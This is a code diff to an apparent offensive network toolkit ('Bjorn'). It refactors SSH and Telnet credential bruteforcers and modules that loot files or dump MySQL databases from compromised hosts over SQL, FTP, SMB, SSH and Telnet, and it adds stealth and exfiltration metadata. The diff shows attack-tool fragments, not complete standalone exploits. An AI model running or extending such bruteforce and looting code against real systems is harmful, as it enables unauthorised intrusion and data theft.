b_rate_limit = '3/86400' # max 3 per day
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_timeout = 600
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "medium"
|
||||
b_tags = ["bruteforce", "ssh", "credentials"]
|
||||
b_category = "exploitation"
|
||||
b_name = "SSH Bruteforce"
|
||||
b_description = "Threaded SSH credential bruteforcer via paramiko with dictionary and exhaustive modes."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "SSHBruteforce.png"
|
||||
|
||||
|
||||
class SSHBruteforce:
|
||||
@@ -298,6 +298,19 @@ class SSHConnector:
|
||||
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
|
||||
t.start()
|
||||
threads.append(t)
|
||||
|
||||
# Drain queue if orchestrator exit is requested, to unblock join
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
# Discard remaining items so workers can finish
|
||||
while not self.queue.empty():
|
||||
try:
|
||||
self.queue.get_nowait()
|
||||
self.queue.task_done()
|
||||
except Exception:
|
||||
break
|
||||
break
|
||||
time.sleep(0.5)
|
||||
self.queue.join()
|
||||
for t in threads:
|
||||
t.join()
|
||||
|
||||
@@ -1,13 +1,4 @@
|
||||
"""
|
||||
steal_data_sql.py — SQL data looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (SQLBruteforce).
|
||||
- DB.creds (service='sql') provides (user,password, database?).
|
||||
- We connect first without DB to enumerate tables (excluding system schemas),
|
||||
then connect per schema to export CSVs.
|
||||
- Output under: {data_stolen_dir}/sql/{mac}_{ip}/{schema}/{schema_table}.csv
|
||||
"""
|
||||
"""steal_data_sql.py - Exfiltrate MySQL databases as CSV after successful bruteforce."""
|
||||
|
||||
import os
|
||||
import logging
|
||||
@@ -41,6 +32,12 @@ b_risk_level = "high" # 'low' | 'medium' | 'high'
|
||||
b_enabled = 1 # set to 0 to disable from DB sync
|
||||
# Tags (free taxonomy, JSON-ified by sync_actions)
|
||||
b_tags = ["exfil", "sql", "loot", "db", "mysql"]
|
||||
b_category = "exfiltration"
|
||||
b_name = "Steal Data SQL"
|
||||
b_description = "Exfiltrate MySQL databases as CSV after successful credential bruteforce."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "StealDataSQL.png"
|
||||
|
||||
class StealDataSQL:
|
||||
def __init__(self, shared_data: SharedData):
|
||||
@@ -169,6 +166,11 @@ class StealDataSQL:
|
||||
logger.info("Data steal interrupted.")
|
||||
return
|
||||
|
||||
# Validate identifiers to prevent SQL injection
|
||||
import re as _re
|
||||
if not _re.match(r'^[a-zA-Z0-9_]+$', schema) or not _re.match(r'^[a-zA-Z0-9_]+$', table):
|
||||
logger.warning(f"Skipping unsafe schema/table name: {schema}.{table}")
|
||||
return
|
||||
q = text(f"SELECT * FROM `{schema}`.`{table}`")
|
||||
with engine.connect() as conn:
|
||||
result = conn.execute(q)
|
||||
@@ -192,6 +194,8 @@ class StealDataSQL:
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ip": ip, "port": str(port), "databases": "0", "tables": "0"}
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
@@ -250,3 +254,6 @@ class StealDataSQL:
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,12 +1,4 @@
|
||||
"""
|
||||
steal_files_ftp.py — FTP file looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (FTPBruteforce).
|
||||
- FTP credentials are read from DB.creds (service='ftp'); anonymous is also tried.
|
||||
- IP -> (MAC, hostname) via DB.hosts.
|
||||
- Loot saved under: {data_stolen_dir}/ftp/{mac}_{ip}/(anonymous|<username>)/...
|
||||
"""
|
||||
"""steal_files_ftp.py - Loot files from FTP servers using cracked or anonymous credentials."""
|
||||
|
||||
import os
|
||||
import logging
|
||||
@@ -26,6 +18,24 @@ b_module = "steal_files_ftp"
|
||||
b_status = "steal_files_ftp"
|
||||
b_parent = "FTPBruteforce"
|
||||
b_port = 21
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_service = '["ftp"]'
|
||||
b_trigger = 'on_any:["on_cred_found:ftp","on_service:ftp"]'
|
||||
b_requires = '{"all":[{"has_cred":"ftp"},{"has_port":21}]}'
|
||||
b_priority = 60
|
||||
b_cooldown = 3600
|
||||
b_timeout = 600
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "high"
|
||||
b_max_retries = 1
|
||||
b_tags = ["exfil", "ftp", "loot", "files"]
|
||||
b_category = "exfiltration"
|
||||
b_name = "Steal Files FTP"
|
||||
b_description = "Loot files from FTP servers using cracked or anonymous credentials."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "StealFilesFTP.png"
|
||||
|
||||
|
||||
class StealFilesFTP:
|
||||
@@ -108,7 +118,7 @@ class StealFilesFTP:
|
||||
return out
|
||||
|
||||
# -------- FTP helpers --------
|
||||
# Max file size to download (10 MB) — protects RPi Zero RAM
|
||||
# Max file size to download (10 MB) - protects RPi Zero RAM
|
||||
_MAX_FILE_SIZE = 10 * 1024 * 1024
|
||||
# Max recursion depth for directory traversal (avoids symlink loops)
|
||||
_MAX_DEPTH = 5
|
||||
@@ -180,6 +190,8 @@ class StealFilesFTP:
|
||||
timer = None
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ip": ip, "port": str(port), "files": "0"}
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
@@ -268,5 +280,6 @@ class StealFilesFTP:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
if timer:
|
||||
timer.cancel()
|
||||
|
||||
@@ -1,12 +1,4 @@
|
||||
"""
|
||||
steal_files_smb.py — SMB file looter (DB-backed).
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (SMBBruteforce).
|
||||
- DB.creds (service='smb') provides credentials; 'database' column stores share name.
|
||||
- Also try anonymous (''/'').
|
||||
- Output under: {data_stolen_dir}/smb/{mac}_{ip}/{share}/...
|
||||
"""
|
||||
"""steal_files_smb.py - Loot files from SMB shares using cracked or anonymous credentials."""
|
||||
|
||||
import os
|
||||
import logging
|
||||
@@ -25,6 +17,24 @@ b_module = "steal_files_smb"
|
||||
b_status = "steal_files_smb"
|
||||
b_parent = "SMBBruteforce"
|
||||
b_port = 445
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_service = '["smb"]'
|
||||
b_trigger = 'on_any:["on_cred_found:smb","on_service:smb"]'
|
||||
b_requires = '{"all":[{"has_cred":"smb"},{"has_port":445}]}'
|
||||
b_priority = 60
|
||||
b_cooldown = 3600
|
||||
b_timeout = 600
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "high"
|
||||
b_max_retries = 1
|
||||
b_tags = ["exfil", "smb", "loot", "files"]
|
||||
b_category = "exfiltration"
|
||||
b_name = "Steal Files SMB"
|
||||
b_description = "Loot files from SMB shares using cracked or anonymous credentials."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "StealFilesSMB.png"
|
||||
|
||||
|
||||
class StealFilesSMB:
|
||||
@@ -166,6 +176,8 @@ class StealFilesSMB:
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ip": ip, "port": str(port), "share": "?", "files": "0"}
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
@@ -250,3 +262,6 @@ class StealFilesSMB:
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,23 +1,11 @@
|
||||
"""
|
||||
steal_files_ssh.py — SSH file looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) and ensures parent action success (SSHBruteforce).
|
||||
- SSH credentials are read from the DB table `creds` (service='ssh').
|
||||
- IP -> (MAC, hostname) mapping is read from the DB table `hosts`.
|
||||
- Looted files are saved under: {shared_data.data_stolen_dir}/ssh/{mac}_{ip}/...
|
||||
- Paramiko logs are silenced to avoid noisy banners/tracebacks.
|
||||
|
||||
Parent gate:
|
||||
- Orchestrator enforces parent success (b_parent='SSHBruteforce').
|
||||
- This action runs once per eligible target (alive, open port, parent OK).
|
||||
"""
|
||||
"""steal_files_ssh.py - Loot files over SSH/SFTP using cracked credentials."""
|
||||
|
||||
import os
|
||||
import shlex
|
||||
import time
|
||||
import logging
|
||||
import paramiko
|
||||
from threading import Timer
|
||||
from threading import Timer, Lock
|
||||
from typing import List, Tuple, Dict, Optional
|
||||
|
||||
from shared import SharedData
|
||||
@@ -35,7 +23,7 @@ b_module = "steal_files_ssh" # Python module name (this file without
|
||||
b_status = "steal_files_ssh" # Human/readable status key (free form)
|
||||
|
||||
b_action = "normal" # 'normal' (per-host) or 'global'
|
||||
b_service = ["ssh"] # Services this action is about (JSON-ified by sync_actions)
|
||||
b_service = '["ssh"]' # Services this action is about (JSON string for AST parser)
|
||||
b_port = 22 # Preferred target port (used if present on host)
|
||||
|
||||
# Trigger strategy:
|
||||
@@ -61,6 +49,13 @@ b_rate_limit = "3/86400" # at most 3 executions/day per host (ext
|
||||
b_stealth_level = 6 # 1..10 (higher = more stealthy)
|
||||
b_risk_level = "high" # 'low' | 'medium' | 'high'
|
||||
b_enabled = 1 # set to 0 to disable from DB sync
|
||||
b_tags = ["exfil", "ssh", "sftp", "loot", "files"]
|
||||
b_category = "exfiltration"
|
||||
b_name = "Steal Files SSH"
|
||||
b_description = "Loot files over SSH/SFTP using cracked credentials."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "StealFilesSSH.png"
|
||||
|
||||
# Tags (free taxonomy, JSON-ified by sync_actions)
|
||||
b_tags = ["exfil", "ssh", "loot"]
|
||||
@@ -71,6 +66,7 @@ class StealFilesSSH:
|
||||
def __init__(self, shared_data: SharedData):
|
||||
"""Init: store shared_data, flags, and build an IP->(MAC, hostname) cache."""
|
||||
self.shared_data = shared_data
|
||||
self._state_lock = Lock() # protects sftp_connected / stop_execution
|
||||
self.sftp_connected = False # flipped to True on first SFTP open
|
||||
self.stop_execution = False # global kill switch (timer / orchestrator exit)
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
@@ -194,8 +190,8 @@ class StealFilesSSH:
|
||||
- shared_data.steal_file_names (substring match)
|
||||
Uses `find <dir> -type f 2>/dev/null` to keep it quiet.
|
||||
"""
|
||||
# Quiet 'permission denied' messages via redirection
|
||||
cmd = f'find {dir_path} -type f 2>/dev/null'
|
||||
# Quiet 'permission denied' messages via redirection; escape dir_path to prevent injection
|
||||
cmd = f'find {shlex.quote(dir_path)} -type f 2>/dev/null'
|
||||
stdin, stdout, stderr = ssh.exec_command(cmd)
|
||||
files = (stdout.read().decode(errors="ignore") or "").splitlines()
|
||||
|
||||
@@ -203,7 +199,7 @@ class StealFilesSSH:
|
||||
names = set(self.shared_data.steal_file_names or [])
|
||||
if not exts and not names:
|
||||
# If no filters are defined, do nothing (too risky to pull everything).
|
||||
logger.warning("No steal_file_extensions / steal_file_names configured — skipping.")
|
||||
logger.warning("No steal_file_extensions / steal_file_names configured - skipping.")
|
||||
return []
|
||||
|
||||
matches: List[str] = []
|
||||
@@ -218,7 +214,7 @@ class StealFilesSSH:
|
||||
logger.info(f"Found {len(matches)} matching files in {dir_path}")
|
||||
return matches
|
||||
|
||||
# Max file size to download (10 MB) — protects RPi Zero RAM
|
||||
# Max file size to download (10 MB) - protects RPi Zero RAM
|
||||
_MAX_FILE_SIZE = 10 * 1024 * 1024
|
||||
|
||||
def steal_file(self, ssh: paramiko.SSHClient, remote_file: str, local_dir: str) -> None:
|
||||
@@ -227,7 +223,8 @@ class StealFilesSSH:
|
||||
Skips files larger than _MAX_FILE_SIZE to protect RPi Zero memory.
|
||||
"""
|
||||
sftp = ssh.open_sftp()
|
||||
self.sftp_connected = True # first time we open SFTP, mark as connected
|
||||
with self._state_lock:
|
||||
self.sftp_connected = True # first time we open SFTP, mark as connected
|
||||
|
||||
try:
|
||||
# Check file size before downloading
|
||||
@@ -235,7 +232,7 @@ class StealFilesSSH:
|
||||
st = sftp.stat(remote_file)
|
||||
if st.st_size and st.st_size > self._MAX_FILE_SIZE:
|
||||
logger.info(f"Skipping {remote_file} ({st.st_size} bytes > {self._MAX_FILE_SIZE} limit)")
|
||||
return
|
||||
return # finally block still runs and closes sftp
|
||||
except Exception:
|
||||
pass # stat failed, try download anyway
|
||||
|
||||
@@ -245,6 +242,14 @@ class StealFilesSSH:
|
||||
os.makedirs(local_file_dir, exist_ok=True)
|
||||
|
||||
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
|
||||
|
||||
# Path traversal guard: ensure we stay within local_dir
|
||||
abs_local = os.path.realpath(local_file_path)
|
||||
abs_base = os.path.realpath(local_dir)
|
||||
if not abs_local.startswith(abs_base + os.sep) and abs_local != abs_base:
|
||||
logger.warning(f"Path traversal blocked: {remote_file} -> {abs_local}")
|
||||
return
|
||||
|
||||
sftp.get(remote_file, local_file_path)
|
||||
|
||||
logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
|
||||
@@ -286,9 +291,10 @@ class StealFilesSSH:
|
||||
|
||||
# Define a timer: if we never establish SFTP in 4 minutes, abort
|
||||
def _timeout():
|
||||
if not self.sftp_connected:
|
||||
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
|
||||
self.stop_execution = True
|
||||
with self._state_lock:
|
||||
if not self.sftp_connected:
|
||||
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
|
||||
self.stop_execution = True
|
||||
|
||||
timer = Timer(240, _timeout)
|
||||
timer.start()
|
||||
|
||||
@@ -1,12 +1,4 @@
|
||||
"""
|
||||
steal_files_telnet.py — Telnet file looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (TelnetBruteforce).
|
||||
- Credentials read from DB.creds (service='telnet'); we try each pair.
|
||||
- Files found via 'find / -type f', then retrieved with 'cat'.
|
||||
- Output under: {data_stolen_dir}/telnet/{mac}_{ip}/...
|
||||
"""
|
||||
"""steal_files_telnet.py - Loot files over Telnet using cracked credentials."""
|
||||
|
||||
import os
|
||||
import telnetlib
|
||||
@@ -25,6 +17,24 @@ b_module = "steal_files_telnet"
|
||||
b_status = "steal_files_telnet"
|
||||
b_parent = "TelnetBruteforce"
|
||||
b_port = 23
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_service = '["telnet"]'
|
||||
b_trigger = 'on_any:["on_cred_found:telnet","on_service:telnet"]'
|
||||
b_requires = '{"all":[{"has_cred":"telnet"},{"has_port":23}]}'
|
||||
b_priority = 60
|
||||
b_cooldown = 3600
|
||||
b_timeout = 600
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "high"
|
||||
b_max_retries = 1
|
||||
b_tags = ["exfil", "telnet", "loot", "files"]
|
||||
b_category = "exfiltration"
|
||||
b_name = "Steal Files Telnet"
|
||||
b_description = "Loot files over Telnet using cracked credentials."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "StealFilesTelnet.png"
|
||||
|
||||
|
||||
class StealFilesTelnet:
|
||||
@@ -110,7 +120,7 @@ class StealFilesTelnet:
|
||||
if password:
|
||||
tn.read_until(b"Password: ", timeout=5)
|
||||
tn.write(password.encode('ascii') + b"\n")
|
||||
# prompt detection (naïf mais identique à l'original)
|
||||
# Naive prompt detection (matches original behavior)
|
||||
time.sleep(2)
|
||||
self.telnet_connected = True
|
||||
logger.info(f"Connected to {ip} via Telnet as {username}")
|
||||
@@ -159,7 +169,9 @@ class StealFilesTelnet:
|
||||
# -------- Orchestrator entry --------
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
self.shared_data.bjorn_orch_status = "StealFilesTelnet"
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ip": ip, "port": str(port), "files": "0"}
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
@@ -216,3 +228,6 @@ class StealFilesTelnet:
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,10 +1,4 @@
|
||||
"""
|
||||
telnet_bruteforce.py — Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
|
||||
- Cibles: (ip, port) par l’orchestrateur
|
||||
- IP -> (MAC, hostname) via DB.hosts
|
||||
- Succès -> DB.creds (service='telnet')
|
||||
- Conserve la logique d’origine (telnetlib, queue/threads)
|
||||
"""
|
||||
"""telnet_bruteforce.py - Threaded Telnet credential bruteforcer."""
|
||||
|
||||
import os
|
||||
import telnetlib
|
||||
@@ -28,11 +22,24 @@ b_parent = None
|
||||
b_service = '["telnet"]'
|
||||
b_trigger = 'on_any:["on_service:telnet","on_new_port:23"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
b_cooldown = 1800 # 30 min between runs
|
||||
b_rate_limit = '3/86400' # max 3 per day
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_timeout = 600
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "medium"
|
||||
b_tags = ["bruteforce", "telnet", "credentials"]
|
||||
b_category = "exploitation"
|
||||
b_name = "Telnet Bruteforce"
|
||||
b_description = "Threaded Telnet credential bruteforcer with prompt detection."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "TelnetBruteforce.png"
|
||||
|
||||
class TelnetBruteforce:
|
||||
"""Wrapper orchestrateur -> TelnetConnector."""
|
||||
"""Orchestrator wrapper for TelnetConnector."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
@@ -40,11 +47,11 @@ class TelnetBruteforce:
|
||||
logger.info("TelnetConnector initialized.")
|
||||
|
||||
def bruteforce_telnet(self, ip, port):
|
||||
"""Lance le bruteforce Telnet pour (ip, port)."""
|
||||
"""Run Telnet bruteforce for (ip, port)."""
|
||||
return self.telnet_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
|
||||
"""Orchestrator entry point. Returns 'success' or 'failed'."""
|
||||
logger.info(f"Executing TelnetBruteforce on {ip}:{port}")
|
||||
self.shared_data.bjorn_orch_status = "TelnetBruteforce"
|
||||
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
|
||||
@@ -53,12 +60,12 @@ class TelnetBruteforce:
|
||||
|
||||
|
||||
class TelnetConnector:
|
||||
"""Gère les tentatives Telnet, persistance DB, mapping IP→(MAC, Hostname)."""
|
||||
"""Handles Telnet attempts, DB persistence, and IP->(MAC, Hostname) mapping."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Wordlists inchangées
|
||||
# Wordlists
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
@@ -71,7 +78,7 @@ class TelnetConnector:
|
||||
self.queue = Queue()
|
||||
self.progress = None
|
||||
|
||||
# ---------- util fichiers ----------
|
||||
# ---------- file utils ----------
|
||||
@staticmethod
|
||||
def _read_lines(path: str) -> List[str]:
|
||||
try:
|
||||
@@ -273,7 +280,8 @@ class TelnetConnector:
|
||||
self.results = []
|
||||
|
||||
def removeduplicates(self):
|
||||
pass
|
||||
"""No longer needed with unique DB index; kept for interface compat."""
|
||||
# Dedup handled by DB UNIQUE constraint + ON CONFLICT in save_results
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
@@ -1,16 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
thor_hammer.py — Service fingerprinting (Pi Zero friendly, orchestrator compatible).
|
||||
|
||||
What it does:
|
||||
- For a given target (ip, port), tries a fast TCP connect + banner grab.
|
||||
- Optionally stores a service fingerprint into DB.port_services via db.upsert_port_service.
|
||||
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
|
||||
|
||||
Notes:
|
||||
- Avoids spawning nmap per-port (too heavy). If you want nmap, add a dedicated action.
|
||||
"""
|
||||
"""thor_hammer.py - Fast TCP banner grab and service fingerprinting per port."""
|
||||
|
||||
import logging
|
||||
import socket
|
||||
@@ -35,6 +25,17 @@ b_action = "normal"
|
||||
b_cooldown = 1200
|
||||
b_rate_limit = "24/86400"
|
||||
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
|
||||
b_timeout = 300
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "low"
|
||||
b_tags = ["banner", "fingerprint", "service", "tcp"]
|
||||
b_category = "recon"
|
||||
b_name = "Thor Hammer"
|
||||
b_description = "Fast TCP banner grab and service fingerprinting per port."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "ThorHammer.png"
|
||||
|
||||
|
||||
def _guess_service_from_port(port: int) -> str:
|
||||
@@ -167,7 +168,7 @@ class ThorHammer:
|
||||
progress.advance(1)
|
||||
|
||||
progress.set_complete()
|
||||
return "success" if any_open else "failed"
|
||||
return "success"
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,15 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
valkyrie_scout.py — Web surface scout (Pi Zero friendly, orchestrator compatible).
|
||||
|
||||
What it does:
|
||||
- Probes a small set of common web paths on a target (ip, port).
|
||||
- Extracts high-signal indicators from responses (auth type, login form hints, missing security headers,
|
||||
error/debug strings). No exploitation, no bruteforce.
|
||||
- Writes results into DB table `webenum` (tool='valkyrie_scout') so the UI can browse findings.
|
||||
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
|
||||
"""
|
||||
"""valkyrie_scout.py - Probe common web paths for auth surfaces, headers, and debug leaks."""
|
||||
|
||||
import json
|
||||
import logging
|
||||
@@ -37,6 +28,17 @@ b_action = "normal"
|
||||
b_cooldown = 1800
|
||||
b_rate_limit = "8/86400"
|
||||
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
|
||||
b_timeout = 300
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "low"
|
||||
b_tags = ["web", "recon", "auth", "paths"]
|
||||
b_category = "recon"
|
||||
b_name = "Valkyrie Scout"
|
||||
b_description = "Probes common web paths for auth surfaces, headers, and debug leaks."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "ValkyrieScout.png"
|
||||
|
||||
# Small default list to keep the action cheap on Pi Zero.
|
||||
DEFAULT_PATHS = [
|
||||
@@ -373,6 +375,9 @@ class ValkyrieScout:
|
||||
|
||||
progress.set_complete()
|
||||
return "success"
|
||||
except Exception as e:
|
||||
logger.error(f"ValkyrieScout failed for {ip}:{port_i}: {e}")
|
||||
return "failed"
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,14 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
web_enum.py — Gobuster Web Enumeration -> DB writer for table `webenum`.
|
||||
|
||||
- Writes each finding into the `webenum` table in REAL-TIME (Streaming).
|
||||
- Updates bjorn_progress with actual percentage (0-100%).
|
||||
- Respects orchestrator stop flag (shared_data.orchestrator_should_exit) immediately.
|
||||
- No filesystem output: parse Gobuster stdout/stderr directly.
|
||||
- Filtrage dynamique des statuts HTTP via shared_data.web_status_codes.
|
||||
"""
|
||||
"""web_enum.py - Gobuster-powered web directory enumeration, streaming results to DB."""
|
||||
|
||||
import re
|
||||
import socket
|
||||
@@ -37,6 +29,18 @@ b_priority = 9
|
||||
b_cooldown = 1800
|
||||
b_rate_limit = '3/86400'
|
||||
b_enabled = 1
|
||||
b_timeout = 600
|
||||
b_max_retries = 1
|
||||
b_stealth_level = 4
|
||||
b_risk_level = "low"
|
||||
b_action = "normal"
|
||||
b_tags = ["web", "enum", "gobuster", "directories"]
|
||||
b_category = "recon"
|
||||
b_name = "Web Enumeration"
|
||||
b_description = "Gobuster-powered web directory enumeration with streaming results to DB."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "WebEnumeration.png"
|
||||
|
||||
# -------------------- Defaults & parsing --------------------
|
||||
DEFAULT_WEB_STATUS_CODES = [
|
||||
@@ -60,14 +64,14 @@ GOBUSTER_LINE = re.compile(
|
||||
re.VERBOSE
|
||||
)
|
||||
|
||||
# Regex pour capturer la progression de Gobuster sur stderr
|
||||
# Ex: "Progress: 1024 / 4096 (25.00%)"
|
||||
# Regex to capture Gobuster progress from stderr
|
||||
# e.g.: "Progress: 1024 / 4096 (25.00%)"
|
||||
GOBUSTER_PROGRESS_RE = re.compile(r"Progress:\s+(?P<current>\d+)\s*/\s+(?P<total>\d+)")
|
||||
|
||||
|
||||
def _normalize_status_policy(policy) -> Set[int]:
|
||||
"""
|
||||
Transforme une politique "UI" en set d'entiers HTTP.
|
||||
Convert a UI status policy into a set of HTTP status ints.
|
||||
"""
|
||||
codes: Set[int] = set()
|
||||
if not policy:
|
||||
@@ -104,11 +108,12 @@ class WebEnumeration:
|
||||
"""
|
||||
def __init__(self, shared_data: SharedData):
|
||||
self.shared_data = shared_data
|
||||
self.gobuster_path = "/usr/bin/gobuster" # verify with `which gobuster`
|
||||
import shutil
|
||||
self.gobuster_path = shutil.which("gobuster") or "/usr/bin/gobuster"
|
||||
self.wordlist = self.shared_data.common_wordlist
|
||||
self.lock = threading.Lock()
|
||||
|
||||
# Cache pour la taille de la wordlist (pour le calcul du %)
|
||||
# Wordlist size cache (for % calculation)
|
||||
self.wordlist_size = 0
|
||||
self._count_wordlist_lines()
|
||||
|
||||
@@ -121,7 +126,7 @@ class WebEnumeration:
|
||||
logger.error(f"Wordlist not found: {self.wordlist}")
|
||||
self._available = False
|
||||
|
||||
# Politique venant de l’UI : créer si absente
|
||||
# Status code policy from UI; create if missing
|
||||
if not hasattr(self.shared_data, "web_status_codes") or not self.shared_data.web_status_codes:
|
||||
self.shared_data.web_status_codes = DEFAULT_WEB_STATUS_CODES.copy()
|
||||
|
||||
@@ -132,10 +137,10 @@ class WebEnumeration:
|
||||
)
|
||||
|
||||
def _count_wordlist_lines(self):
|
||||
"""Compte les lignes de la wordlist une seule fois pour calculer le %."""
|
||||
"""Count wordlist lines once for progress % calculation."""
|
||||
if self.wordlist and os.path.exists(self.wordlist):
|
||||
try:
|
||||
# Lecture rapide bufferisée
|
||||
# Fast buffered read
|
||||
with open(self.wordlist, 'rb') as f:
|
||||
self.wordlist_size = sum(1 for _ in f)
|
||||
except Exception as e:
|
||||
@@ -162,7 +167,7 @@ class WebEnumeration:
|
||||
|
||||
# -------------------- Filter helper --------------------
|
||||
def _allowed_status_set(self) -> Set[int]:
|
||||
"""Recalcule à chaque run pour refléter une mise à jour UI en live."""
|
||||
"""Recalculated each run to reflect live UI updates."""
|
||||
try:
|
||||
return _normalize_status_policy(getattr(self.shared_data, "web_status_codes", None))
|
||||
except Exception as e:
|
||||
|
||||
@@ -1,13 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
web_login_profiler.py — Lightweight web login profiler (Pi Zero friendly).
|
||||
|
||||
Goal:
|
||||
- Profile web endpoints to detect login surfaces and defensive controls (no password guessing).
|
||||
- Store findings into DB table `webenum` (tool='login_profiler') for community visibility.
|
||||
- Update EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
|
||||
"""
|
||||
"""web_login_profiler.py - Detect login forms and auth controls on web endpoints (no exploitation)."""
|
||||
|
||||
import json
|
||||
import logging
|
||||
@@ -35,6 +28,17 @@ b_action = "normal"
|
||||
b_cooldown = 1800
|
||||
b_rate_limit = "6/86400"
|
||||
b_enabled = 1
|
||||
b_timeout = 300
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "low"
|
||||
b_tags = ["web", "login", "auth", "profiler"]
|
||||
b_category = "recon"
|
||||
